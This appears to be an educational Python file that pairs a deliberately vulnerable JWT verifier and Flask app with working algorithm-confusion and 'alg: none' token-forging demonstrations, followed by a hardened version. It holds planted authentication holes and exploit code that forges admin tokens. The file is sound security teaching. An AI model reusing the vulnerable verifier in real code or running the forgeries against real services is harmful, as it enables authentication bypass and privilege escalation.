# VULNERABLE: JWT implementation susceptible to algorithm confusion
import jwt
import json
import base64
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import serialization
class VulnerableJWTService:
    """Deliberately vulnerable JWT verifier used to demonstrate algorithm confusion.

    Each instance generates a fresh 2048-bit RSA key pair and issues RS256
    tokens. The verification methods are intentionally unsafe: they let the
    token header choose the algorithm and reuse the RSA *public* key PEM as an
    HMAC secret, and one of them accepts unsigned ``alg: none`` tokens.
    DO NOT use this class outside of the demonstration.
    """

    def __init__(self):
        # Generate RSA key pair for demonstration
        self.private_key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048
        )
        self.public_key = self.private_key.public_key()
        # PEM-serialized public key. It is public information, which is exactly
        # why using it as an HMAC secret (see the verifiers) lets anyone forge
        # tokens. cryptography's serializers are public_bytes / private_bytes.
        self.public_key_pem = self.public_key.public_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PublicFormat.SubjectPublicKeyInfo
        )
        self.private_key_pem = self.private_key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.PKCS8,
            encryption_algorithm=serialization.NoEncryption()
        )

    def create_rs256_token(self, payload):
        """Create a legitimate RS256 token signed with the private key."""
        return jwt.encode(payload, self.private_key_pem, algorithm='RS256')

    def verify_token_vulnerable(self, token):
        """VULNERABLE: accepts whichever of RS256/HS256 the token header names.

        Returns:
            dict: ``{'valid': True, 'payload': ...}`` on success, otherwise
            ``{'valid': False, 'error': <message>}``.
        """
        try:
            # CRITICAL VULNERABILITY: the same public-key PEM is offered for
            # both RS256 and HS256, so an HS256 token HMAC-signed with the
            # (public) PEM would verify.
            decoded = jwt.decode(token, self.public_key_pem,
                                 algorithms=['RS256', 'HS256'])  # Allows both!
            return {'valid': True, 'payload': decoded}
        except jwt.PyJWTError as e:
            # PyJWTError (not only InvalidTokenError) also covers
            # InvalidKeyError, which recent PyJWT releases raise when a PEM key
            # is used as an HMAC secret.
            return {'valid': False, 'error': str(e)}

    def verify_token_flexible(self, token):
        """VULNERABLE: picks the verification algorithm from the token header.

        ``RS256`` and ``HS256`` are both checked against the public-key PEM,
        and ``none`` skips signature verification entirely.

        Returns:
            dict: ``{'valid': True, 'payload': ..., 'algorithm': ...}`` on
            success; ``{'valid': False, 'error': ...}`` for unsupported
            algorithms and for any PyJWT error, including malformed tokens.
        """
        try:
            # Unverified header read (base64url + JSON). Malformed input raises
            # a PyJWT DecodeError here instead of escaping to the caller.
            algorithm = jwt.get_unverified_header(token).get('alg')
            if algorithm == 'RS256':
                # Use public key for RSA
                decoded = jwt.decode(token, self.public_key_pem,
                                     algorithms=['RS256'])
            elif algorithm == 'HS256':
                # VULNERABLE: Use public key as HMAC secret!
                decoded = jwt.decode(token, self.public_key_pem,
                                     algorithms=['HS256'])
            elif algorithm == 'none':
                # VULNERABLE: Accept unsigned tokens
                decoded = jwt.decode(token, options={"verify_signature": False})
            else:
                return {'valid': False, 'error': 'Unsupported algorithm'}
            return {'valid': True, 'payload': decoded, 'algorithm': algorithm}
        except jwt.PyJWTError as e:
            return {'valid': False, 'error': str(e)}
# ATTACK DEMONSTRATION: Algorithm confusion exploit
def demonstrate_algorithm_confusion_attack():
    """Run the RS256 -> HS256 algorithm-confusion attack against VulnerableJWTService.

    Issues a legitimate RS256 token, forges an HS256 token HMAC-signed with the
    service's RSA public-key PEM, verifies both with the vulnerable verifiers
    and prints the results. Returns None.
    """
    import time  # local import: the vulnerable half of this file does not import time

    # Initialize vulnerable service
    service = VulnerableJWTService()
    # Step 1: Create legitimate RS256 token. The expiry is relative to now so
    # the token can actually verify (a fixed 1234567890, i.e. 2009, was
    # always expired).
    legitimate_payload = {
        'user': 'normal_user',
        'role': 'user',
        'exp': int(time.time()) + 3600
    }
    legitimate_token = service.create_rs256_token(legitimate_payload)
    print(f"Legitimate RS256 token: {legitimate_token}")
    # Step 2: Create malicious payload
    malicious_payload = {
        'user': 'attacker',
        'role': 'admin',  # Privilege escalation!
        'exp': 9999999999
    }
    # Step 3: Create forged HS256 token using RSA public key as HMAC secret.
    # This is the core of the algorithm confusion attack.
    try:
        forged_token = jwt.encode(malicious_payload, service.public_key_pem, algorithm='HS256')
    except jwt.InvalidKeyError as e:
        # Recent PyJWT releases refuse a PEM-encoded asymmetric key as an HMAC
        # secret, which stops the attack before a token can even be forged.
        print(f"Forging refused by PyJWT: {e}")
        print("\n✅ Attack failed - PyJWT refused to forge the token")
        return
    print(f"Forged HS256 token: {forged_token}")
    # Step 4: Verify tokens using vulnerable verification
    print("\n--- Verification Results ---")
    # Legitimate token verification
    result1 = service.verify_token_vulnerable(legitimate_token)
    print(f"Legitimate token verification: {result1}")
    # Forged token verification - THIS SHOULD FAIL BUT MIGHT SUCCEED!
    result2 = service.verify_token_vulnerable(forged_token)
    print(f"Forged token verification: {result2}")
    # Demonstrate flexible verification vulnerability
    result3 = service.verify_token_flexible(forged_token)
    print(f"Flexible verification of forged token: {result3}")
    # Step 5: Show how attacker gains admin access
    if result2['valid'] and result2['payload'].get('role') == 'admin':
        print("\n🚨 ATTACK SUCCESSFUL! Attacker gained admin access!")
        print(f"Attacker payload: {result2['payload']}")
    else:
        print("\n✅ Attack failed - system properly secured")
# Additional attack vectors
def demonstrate_none_algorithm_attack():
    """Build and print an unsigned JWT whose header declares ``alg: none``.

    JWS compact serialization (RFC 7515) encodes each segment as unpadded
    base64url, so ``urlsafe_b64encode`` is used; the signature segment is empty.

    Returns:
        str: the token ``<header>.<payload>.`` (note the trailing dot).
    """
    def b64url_json(obj):
        # Unpadded base64url encoding of the object's JSON text.
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip('=')

    header = {"alg": "none", "typ": "JWT"}
    payload = {"user": "attacker", "role": "admin", "exp": 9999999999}
    # 'none' algorithm has empty signature
    unsigned_token = f"{b64url_json(header)}.{b64url_json(payload)}."
    print(f"Unsigned 'none' token: {unsigned_token}")
    return unsigned_token
def demonstrate_key_confusion_attack():
    """Forge an HS256 token keyed with a service's RSA public-key PEM.

    The public key is the kind of material an attacker can usually obtain
    (often exposed in a JWKS endpoint).

    Returns:
        str | None: the forged token, or ``None`` when PyJWT refuses to use the
        PEM as an HMAC secret.
    """
    service = VulnerableJWTService()
    # Attacker obtains public key (often exposed in JWKS endpoint)
    public_key_content = service.public_key_pem.decode()
    # Create malicious token using public key as HMAC secret
    malicious_payload = {
        'user': 'attacker',
        'role': 'admin',
        'iss': 'trusted-issuer',
        'exp': 9999999999
    }
    try:
        # Sign with public key as HMAC secret
        attack_token = jwt.encode(malicious_payload, public_key_content, algorithm='HS256')
    except jwt.InvalidKeyError as e:
        # Recent PyJWT releases reject PEM/asymmetric keys as HMAC secrets.
        print(f"Key confusion attack refused by PyJWT: {e}")
        return None
    print(f"Key confusion attack token: {attack_token}")
    # Such a token can only pass a verifier that offers this same PEM for
    # HS256 (as VulnerableJWTService does), and only if the installed PyJWT
    # does no key-type check while decoding.
    # NOTE: `service` is a throwaway instance with its own freshly generated
    # key, so this token matches that key only, not any other instance's.
    return attack_token
# Flask web application demonstrating vulnerable endpoints
from flask import Flask, request, jsonify
# Flask app for the deliberately vulnerable demo routes, plus the single
# VulnerableJWTService they all share. Constructing the service generates a
# fresh RSA key pair at import time, so tokens do not survive a restart.
app = Flask(__name__)
vulnerable_service = VulnerableJWTService()
@app.route('/login', methods=['POST'])
def login():
    """Issue an RS256 token for any non-empty username/password (demo only).

    No credential check is performed: any request carrying both fields gets a
    token, and the username ``admin`` receives the ``admin`` role.

    Returns:
        ``{'token': ...}`` on success; 401 ``{'error': 'Invalid credentials'}``
        when either field is missing or the body is not a JSON object.
    """
    import time  # local import: the vulnerable half of this file does not import time

    # silent=True yields None for a missing/malformed JSON body instead of
    # raising; a non-object body (e.g. a JSON list) is treated as empty too.
    data = request.get_json(silent=True)
    if not isinstance(data, dict):
        data = {}
    username = data.get('username')
    password = data.get('password')
    # Simplified authentication (insecure for demo)
    if username and password:
        payload = {
            'user': username,
            'role': 'admin' if username == 'admin' else 'user',
            # Expire one hour from now. A fixed 1234567890 (2009) made every
            # issued token already expired.
            'exp': int(time.time()) + 3600
        }
        token = vulnerable_service.create_rs256_token(payload)
        return jsonify({'token': token})
    return jsonify({'error': 'Invalid credentials'}), 401
@app.route('/protected', methods=['GET'])
def protected_endpoint():
    """VULNERABLE protected route: accepts any token verify_token_flexible accepts.

    Returns 401 without a ``Bearer`` header or when verification fails;
    otherwise echoes the ``user``/``role`` claims and the header's algorithm.
    """
    scheme = 'Bearer '
    header_value = request.headers.get('Authorization')
    if not header_value or not header_value.startswith(scheme):
        return jsonify({'error': 'No token provided'}), 401
    # VULNERABLE: Use flexible verification (algorithm taken from the header)
    outcome = vulnerable_service.verify_token_flexible(header_value[len(scheme):])
    if not outcome['valid']:
        return jsonify({'error': 'Invalid token'}), 401
    claims = outcome['payload']
    body = {
        'message': 'Access granted',
        'user': claims['user'],
        'role': claims['role'],
        'algorithm_used': outcome.get('algorithm', 'unknown')
    }
    return jsonify(body)
@app.route('/admin', methods=['GET'])
def admin_endpoint():
    """VULNERABLE admin route: trusts the ``role`` claim of a flexibly-verified token.

    Returns 401 without a ``Bearer`` header or when verification fails, 403
    when ``role`` is not ``admin``, otherwise the "sensitive" payload.
    """
    header_value = request.headers.get('Authorization')
    has_bearer = bool(header_value) and header_value.startswith('Bearer ')
    if not has_bearer:
        return jsonify({'error': 'No token provided'}), 401
    outcome = vulnerable_service.verify_token_flexible(header_value[len('Bearer '):])
    if not outcome['valid']:
        return jsonify({'error': 'Invalid token'}), 401
    claims = outcome['payload']
    # Vulnerable role check - can be bypassed with forged tokens
    if claims.get('role') == 'admin':
        return jsonify({
            'message': 'Admin access granted',
            'sensitive_data': 'This should only be accessible to real admins',
            'user': claims['user'],
            'token_algorithm': outcome.get('algorithm')
        })
    return jsonify({'error': 'Admin access required'}), 403
if __name__ == '__main__':
    print("=== JWT Algorithm Confusion Vulnerability Demo ===")
    # Run attack demonstrations
    demonstrate_algorithm_confusion_attack()
    print("\n" + "="*50)
    none_token = demonstrate_none_algorithm_attack()
    print("\n" + "="*50)
    key_confusion_token = demonstrate_key_confusion_attack()
    print("\n=== Starting vulnerable web server ===")
    print("Try the following attacks:")
    print("1. Use forged HS256 tokens on /protected and /admin endpoints")
    print("2. Use 'none' algorithm tokens")
    print("3. Observe how algorithm confusion bypasses authentication")
    # debug=False on purpose. The JWT flaws are the subject of this demo, but
    # debug mode would also turn on the interactive Werkzeug debugger (an
    # unrelated code-execution risk) and the reloader, which re-runs this
    # script in a child process and repeats every demonstration above.
    # Bind to loopback explicitly so the intentionally vulnerable server is
    # not reachable from other hosts.
    # NOTE(review): app.run() blocks, so the code later in this file is not
    # reached while the server runs. The file looks like two scripts
    # concatenated; consider splitting it.
    app.run(host='127.0.0.1', port=5000, debug=False)
# SECURE: JWT implementation with proper algorithm validation
import jwt
import json
import base64
import hmac
import hashlib
from datetime import datetime, timedelta
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
from typing import Dict, Any, Optional
import logging
# Configure root logging at INFO level so the security events this module
# writes through `logger` (info for routine events, error for alerts) are emitted.
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class SecureJWTService:
    """Issue and verify JWTs with a single, fixed signing algorithm.

    The algorithm is chosen at construction time (``'RS256'`` or ``'HS256'``).
    Both signing and verification use only that algorithm and its own key
    material. A token whose header names any other ``alg`` is rejected before
    its signature is checked, which is what blocks algorithm-confusion attacks.
    Keys are generated in-process by ``__init__``, so tokens do not survive a
    restart.

    Security events are kept in a bounded in-memory list (the newest
    ``MAX_SECURITY_EVENTS``) with a running total, and mirrored to ``logger``.
    """

    # Algorithms this class can actually sign and verify with.
    SUPPORTED_ALGORITHMS = ('RS256', 'HS256')
    # Algorithms rejected outright, with a dedicated "insecure" error.
    INSECURE_ALGORITHMS = ('none', 'HS1', 'RS1')
    # Cap on retained security events. Every verification records one, so an
    # unbounded list would grow for the whole lifetime of a server process.
    MAX_SECURITY_EVENTS = 1000

    def __init__(self, algorithm: str = 'RS256'):
        """Initialize with strict algorithm enforcement.

        Args:
            algorithm: ``'RS256'`` (new 2048-bit RSA key pair) or ``'HS256'``
                (new 256-bit random secret).

        Raises:
            ValueError: if ``algorithm`` is insecure or not implemented.
        """
        self.algorithm = algorithm
        self.validate_algorithm_support()
        # Generate separate keys for different algorithms
        if algorithm == 'RS256':
            self.setup_rsa_keys()
        elif algorithm == 'HS256':
            self.setup_hmac_keys()
        else:
            # Defensive: validate_algorithm_support() already rejects this.
            raise ValueError(f"Unsupported algorithm: {algorithm}")
        # Security configuration
        self.token_expiry = timedelta(minutes=15)
        self.issuer = 'secure-jwt-service'
        self.audience = 'secure-app'
        # Track security events: newest MAX_SECURITY_EVENTS are kept, plus a
        # running count of every event ever recorded.
        self.security_events = []
        self.total_security_events = 0

    def validate_algorithm_support(self):
        """Reject ``self.algorithm`` unless it is secure and implemented.

        The insecure check runs first so that names such as ``'none'`` get the
        specific "insecure" message. Every insecure name is also unsupported,
        so in the opposite order that check could never fire.

        Raises:
            ValueError: if the algorithm is insecure or not implemented.
        """
        if self.algorithm in self.INSECURE_ALGORITHMS:
            raise ValueError(f"Algorithm {self.algorithm} is insecure")
        if self.algorithm not in self.SUPPORTED_ALGORITHMS:
            raise ValueError(f"Algorithm {self.algorithm} is not supported")

    def setup_rsa_keys(self):
        """Generate a 2048-bit RSA key pair and its PEM encodings for RS256."""
        self.private_key = rsa.generate_private_key(
            public_exponent=65537,
            key_size=2048
        )
        self.public_key = self.private_key.public_key()
        # Serialize keys (cryptography API: private_bytes / public_bytes)
        self.private_key_pem = self.private_key.private_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PrivateFormat.PKCS8,
            encryption_algorithm=serialization.NoEncryption()
        )
        self.public_key_pem = self.public_key.public_bytes(
            encoding=serialization.Encoding.PEM,
            format=serialization.PublicFormat.SubjectPublicKeyInfo
        )
        logger.info("RSA keys generated for RS256 algorithm")

    def setup_hmac_keys(self):
        """Generate a cryptographically random 256-bit HMAC secret for HS256."""
        import secrets
        self.hmac_secret = secrets.token_bytes(32)
        logger.info("HMAC secret generated for HS256 algorithm")

    @staticmethod
    def _utc_now() -> datetime:
        """Return the current time as a timezone-aware UTC datetime.

        ``datetime.utcnow()`` returns a naive value that ``.timestamp()``
        interprets as *local* time. That skews ``iat``/``exp`` by the host's
        UTC offset, which makes tokens expired or not-yet-valid on any host
        not running in UTC. An aware datetime converts to the correct epoch.
        """
        from datetime import timezone  # local import: only datetime/timedelta are imported at file level
        return datetime.now(timezone.utc)

    def create_token(self, payload: Dict[str, Any],
                     custom_expiry: Optional[timedelta] = None) -> str:
        """Sign ``payload`` with the enforced algorithm, adding security claims.

        ``iss``, ``aud``, ``iat``, ``exp`` and a random ``jti`` are merged in
        after the caller's claims, so ``payload`` cannot override them.

        Args:
            payload: application claims (e.g. ``user``, ``role``).
            custom_expiry: token lifetime; defaults to ``self.token_expiry``.

        Returns:
            The encoded JWT.

        Raises:
            ValueError: if ``payload`` is not a dict or signing is unsupported.
            Exception: any signing error is recorded and re-raised.
        """
        if not isinstance(payload, dict):
            raise ValueError("Payload must be a dictionary")
        # Add security claims
        now = self._utc_now()
        expiry = custom_expiry or self.token_expiry
        secure_payload = {
            **payload,
            'iss': self.issuer,
            'aud': self.audience,
            'iat': int(now.timestamp()),
            'exp': int((now + expiry).timestamp()),
            'jti': self.generate_jti()  # Unique token ID
        }
        try:
            if self.algorithm == 'RS256':
                token = jwt.encode(secure_payload, self.private_key_pem,
                                   algorithm='RS256')
            elif self.algorithm == 'HS256':
                token = jwt.encode(secure_payload, self.hmac_secret,
                                   algorithm='HS256')
            else:
                raise ValueError(f"Token creation not supported for {self.algorithm}")
            self.log_security_event('TOKEN_CREATED', {
                'algorithm': self.algorithm,
                'user': payload.get('user', 'unknown'),
                'expiry': expiry.total_seconds()
            })
            return token
        except Exception as e:
            self.log_security_event('TOKEN_CREATION_FAILED', {
                'error': str(e),
                'algorithm': self.algorithm
            })
            raise

    def verify_token(self, token: str,
                     validate_audience: bool = True,
                     validate_issuer: bool = True) -> Dict[str, Any]:
        """Verify ``token`` with the enforced algorithm and return its claims.

        The header's ``alg`` is checked against ``self.algorithm`` before any
        cryptography runs. ``jwt.decode`` is also given exactly one allowed
        algorithm.

        Raises:
            ValueError: for every failure (malformed token, algorithm mismatch,
                expiry, audience/issuer mismatch, bad signature, missing claims).
        """
        if not token or not isinstance(token, str):
            raise ValueError("Token must be a non-empty string")
        # CRITICAL: Validate algorithm before verification
        self.validate_token_algorithm(token)
        # Prepare verification options
        options = {
            'verify_signature': True,
            'verify_exp': True,
            'verify_iat': True,
            'verify_aud': validate_audience,
            'verify_iss': validate_issuer
        }
        try:
            if self.algorithm == 'RS256':
                decoded = jwt.decode(
                    token,
                    self.public_key_pem,
                    algorithms=['RS256'],  # STRICT: Only allow RS256
                    audience=self.audience if validate_audience else None,
                    issuer=self.issuer if validate_issuer else None,
                    options=options
                )
            elif self.algorithm == 'HS256':
                decoded = jwt.decode(
                    token,
                    self.hmac_secret,
                    algorithms=['HS256'],  # STRICT: Only allow HS256
                    audience=self.audience if validate_audience else None,
                    issuer=self.issuer if validate_issuer else None,
                    options=options
                )
            else:
                raise ValueError(f"Verification not supported for {self.algorithm}")
            # Additional security validations
            self.validate_token_claims(decoded)
            self.log_security_event('TOKEN_VERIFIED', {
                'algorithm': self.algorithm,
                'user': decoded.get('user', 'unknown'),
                'jti': decoded.get('jti')
            })
            return decoded
        except jwt.ExpiredSignatureError:
            self.log_security_event('TOKEN_EXPIRED', {
                'algorithm': self.algorithm
            })
            raise ValueError("Token has expired")
        except jwt.InvalidAudienceError:
            self.log_security_event('INVALID_AUDIENCE', {
                'algorithm': self.algorithm
            })
            raise ValueError("Invalid token audience")
        except jwt.InvalidIssuerError:
            self.log_security_event('INVALID_ISSUER', {
                'algorithm': self.algorithm
            })
            raise ValueError("Invalid token issuer")
        except jwt.InvalidAlgorithmError:
            self.log_security_event('ALGORITHM_MISMATCH', {
                'expected': self.algorithm,
                'token_header': self.parse_token_header(token)
            })
            raise ValueError("Algorithm mismatch detected")
        except Exception as e:
            self.log_security_event('TOKEN_VERIFICATION_FAILED', {
                'error': str(e),
                'algorithm': self.algorithm
            })
            raise ValueError("Token verification failed")

    def validate_token_algorithm(self, token: str):
        """Raise ValueError unless the token header's ``alg`` equals ``self.algorithm``."""
        try:
            header = self.parse_token_header(token)
            token_algorithm = header.get('alg')
            # CRITICAL: Strict algorithm validation
            if token_algorithm != self.algorithm:
                self.log_security_event('ALGORITHM_CONFUSION_ATTEMPT', {
                    'expected': self.algorithm,
                    'provided': token_algorithm,
                    'severity': 'CRITICAL'
                })
                raise ValueError(f"Algorithm confusion detected. Expected {self.algorithm}, got {token_algorithm}")
            # Defense in depth: self.algorithm can never be insecure, so this
            # only fires if the class constants are changed inconsistently.
            if token_algorithm in self.INSECURE_ALGORITHMS:
                self.log_security_event('DANGEROUS_ALGORITHM_DETECTED', {
                    'algorithm': token_algorithm,
                    'severity': 'CRITICAL'
                })
                raise ValueError(f"Dangerous algorithm detected: {token_algorithm}")
        except json.JSONDecodeError:
            raise ValueError("Invalid token header format")

    def parse_token_header(self, token: str) -> Dict[str, Any]:
        """Decode the unverified header segment of a compact JWT.

        JWT segments are unpadded base64url (RFC 7515), so padding is restored
        and ``urlsafe_b64decode`` is used. The standard-alphabet decoder
        silently drops ``-``/``_`` and returns garbage.

        Raises:
            ValueError: if the header is not base64url-encoded UTF-8 JSON
                describing an object.
        """
        try:
            header_b64 = token.split('.')[0]
            # Pad to a multiple of 4 (adds nothing when already aligned).
            header_b64 += '=' * (-len(header_b64) % 4)
            header_json = base64.urlsafe_b64decode(header_b64).decode('utf-8')
            header = json.loads(header_json)
        except (IndexError, json.JSONDecodeError, ValueError) as e:
            raise ValueError(f"Invalid token format: {e}") from e
        if not isinstance(header, dict):
            raise ValueError("Invalid token format: header is not a JSON object")
        return header

    def validate_token_claims(self, payload: Dict[str, Any]):
        """Require the standard claims and reject tokens issued over 24h ago.

        Raises:
            ValueError: if a required claim is missing or the token is too old.
        """
        required_claims = ['iss', 'aud', 'iat', 'exp', 'jti']
        for claim in required_claims:
            if claim not in payload:
                raise ValueError(f"Missing required claim: {claim}")
        # Validate token age (both sides are true Unix epoch seconds)
        max_token_age = timedelta(hours=24).total_seconds()
        token_age = self._utc_now().timestamp() - payload['iat']
        if token_age > max_token_age:
            self.log_security_event('TOKEN_TOO_OLD', {
                'age_hours': token_age / 3600,
                'jti': payload.get('jti')
            })
            raise ValueError("Token is too old")
        # Record use of high-privilege roles for monitoring
        if payload.get('role') in ['admin', 'superadmin']:
            self.log_security_event('HIGH_PRIVILEGE_TOKEN_USED', {
                'user': payload.get('user'),
                'role': payload.get('role'),
                'jti': payload.get('jti')
            })

    def generate_jti(self) -> str:
        """Generate a random, URL-safe unique token identifier."""
        import secrets
        return secrets.token_urlsafe(16)

    def log_security_event(self, event_type: str, details: Dict[str, Any]):
        """Record a security event in the bounded buffer and the module logger."""
        event = {
            'timestamp': self._utc_now().isoformat(),
            'event_type': event_type,
            'details': details
        }
        self.security_events.append(event)
        self.total_security_events += 1
        # Keep only the newest events so memory stays bounded.
        overflow = len(self.security_events) - self.MAX_SECURITY_EVENTS
        if overflow > 0:
            del self.security_events[:overflow]
        # Log to system logger
        if event_type in ['ALGORITHM_CONFUSION_ATTEMPT', 'DANGEROUS_ALGORITHM_DETECTED']:
            logger.error("SECURITY ALERT: %s - %s", event_type, details)
        else:
            logger.info("Security event: %s - %s", event_type, details)

    def get_security_report(self) -> Dict[str, Any]:
        """Summarize security events: total count and the 10 most recent."""
        return {
            'algorithm_enforced': self.algorithm,
            'total_events': self.total_security_events,
            'recent_events': self.security_events[-10:],  # Last 10 events
            'report_generated': self._utc_now().isoformat()
        }
# SECURE: Flask application with proper JWT handling
from flask import Flask, request, jsonify
from functools import wraps
# Flask application for the secure routes below.
# NOTE(review): this rebinds the module-level name `app` that the vulnerable
# demo earlier in this file also defines; the file looks like two scripts
# concatenated.
app = Flask(__name__)
# Single RS256 service shared by all routes. Constructing it generates a new
# RSA key pair at import time, so issued tokens do not survive a restart.
secure_jwt_service = SecureJWTService(algorithm='RS256')
def require_auth(f):
    """Decorator: require a valid ``Authorization: Bearer <jwt>`` header.

    The verified claims are stored on ``request.current_user`` before the
    wrapped view runs. A missing or non-Bearer header yields 401
    ``Authentication required``. A token rejected by ``verify_token`` (which
    raises ``ValueError``) yields 401 ``Authentication failed`` with the
    reason in ``message``.
    """
    @wraps(f)
    def decorated_function(*args, **kwargs):
        auth_header = request.headers.get('Authorization')
        if not auth_header or not auth_header.startswith('Bearer '):
            return jsonify({'error': 'Authentication required'}), 401
        token = auth_header[7:]  # Remove 'Bearer ' prefix
        try:
            # Strict token verification
            payload = secure_jwt_service.verify_token(token)
        except ValueError as e:
            return jsonify({
                'error': 'Authentication failed',
                'message': str(e)
            }), 401
        # Only verification sits inside the try. A ValueError raised by the
        # view itself is an application error, not an authentication failure,
        # and must not be reported to the client as a 401 with its message.
        request.current_user = payload
        return f(*args, **kwargs)
    return decorated_function
def require_role(required_role: str):
    """Decorator factory: allow the view only if the caller's ``role`` claim is *required_role*.

    Expects ``request.current_user`` to have been set (by ``require_auth``);
    without it the response is 401. A role mismatch is recorded as an
    ``UNAUTHORIZED_ACCESS_ATTEMPT`` security event and answered with 403.
    """
    def decorator(f):
        @wraps(f)
        def decorated_function(*args, **kwargs):
            if not hasattr(request, 'current_user'):
                return jsonify({'error': 'Authentication required'}), 401
            claims = request.current_user
            actual_role = claims.get('role')
            if actual_role == required_role:
                return f(*args, **kwargs)
            secure_jwt_service.log_security_event('UNAUTHORIZED_ACCESS_ATTEMPT', {
                'user': claims.get('user'),
                'required_role': required_role,
                'user_role': actual_role
            })
            return jsonify({'error': 'Insufficient permissions'}), 403
        return decorated_function
    return decorator
@app.route('/login', methods=['POST'])
def secure_login():
    """Issue a signed token for a username/password pair (demo authentication).

    NOTE: credentials are not checked against any store. Any non-empty
    username and password are accepted, and the username ``admin`` gets the
    ``admin`` role. Replace with real credential verification before use.

    Returns:
        ``token``/``expires_in``/``token_type``/``algorithm`` on success;
        401 ``Invalid credentials`` when a field is missing or the body is not
        a JSON object; 500 ``Token creation failed`` if signing fails.
    """
    # silent=True returns None for a missing/malformed JSON body instead of
    # raising (depending on the Flask version); a non-object JSON body is
    # treated as empty. Either way the request gets a 401, not an
    # AttributeError turned into a 500.
    data = request.get_json(silent=True)
    if not isinstance(data, dict):
        data = {}
    username = data.get('username')
    password = data.get('password')
    if not (username and password):
        return jsonify({'error': 'Invalid credentials'}), 401
    # In production, verify credentials against secure storage
    role = 'admin' if username == 'admin' else 'user'
    try:
        token = secure_jwt_service.create_token({'user': username, 'role': role})
    except Exception:
        # create_token already records TOKEN_CREATION_FAILED; keep the
        # details out of the response.
        return jsonify({'error': 'Token creation failed'}), 500
    return jsonify({
        'token': token,
        # NOTE(review): hard-coded; matches the service's default 15-minute
        # token_expiry only as long as that default is unchanged.
        'expires_in': '15m',
        'token_type': 'Bearer',
        'algorithm': secure_jwt_service.algorithm
    })
@app.route('/protected', methods=['GET'])
@require_auth
def secure_protected():
    """Echo the caller's identity claims; reachable only with a verified token."""
    claims = request.current_user
    response_body = {
        'message': 'Access granted with secure authentication',
        'user': claims['user'],
        'role': claims['role'],
        'algorithm': secure_jwt_service.algorithm,
        'token_id': claims.get('jti')
    }
    return jsonify(response_body)
@app.route('/admin', methods=['GET'])
@require_auth
@require_role('admin')
def secure_admin():
    """Return admin-only data after token verification and an ``admin`` role check."""
    claims = request.current_user
    response_body = {
        'message': 'Secure admin access granted',
        'sensitive_data': 'This is properly protected admin data',
        'user': claims['user'],
        'algorithm': secure_jwt_service.algorithm
    }
    return jsonify(response_body)
@app.route('/security/report', methods=['GET'])
@require_auth
@require_role('admin')
def security_report():
    """Expose the JWT service's security-event summary to authenticated admins."""
    report = secure_jwt_service.get_security_report()
    return jsonify(report)
@app.errorhandler(Exception)
def handle_error(error):
    """Catch-all handler: record unexpected exceptions and return a generic 500.

    Werkzeug HTTP exceptions (404, 405, 415, ...) also reach a handler
    registered for ``Exception``. They are returned unchanged so clients keep
    the correct status code instead of every error becoming a 500.
    """
    # Duck-typed HTTPException check (integer ``code`` plus ``get_response``)
    # so werkzeug need not be imported directly; Flask renders a returned
    # HTTPException as its own response.
    if isinstance(getattr(error, 'code', None), int) and callable(getattr(error, 'get_response', None)):
        return error
    secure_jwt_service.log_security_event('APPLICATION_ERROR', {
        'error': str(error),
        'endpoint': request.endpoint
    })
    return jsonify({
        'error': 'Internal server error'
    }), 500
if __name__ == '__main__':
    startup_banner = (
        "=== Secure JWT Service Started ===",
        f"Algorithm enforced: {secure_jwt_service.algorithm}",
        "Algorithm confusion attacks are prevented",
        "Security monitoring is active",
    )
    for banner_line in startup_banner:
        print(banner_line)
    # Debug disabled for security
    app.run(port=5000, debug=False)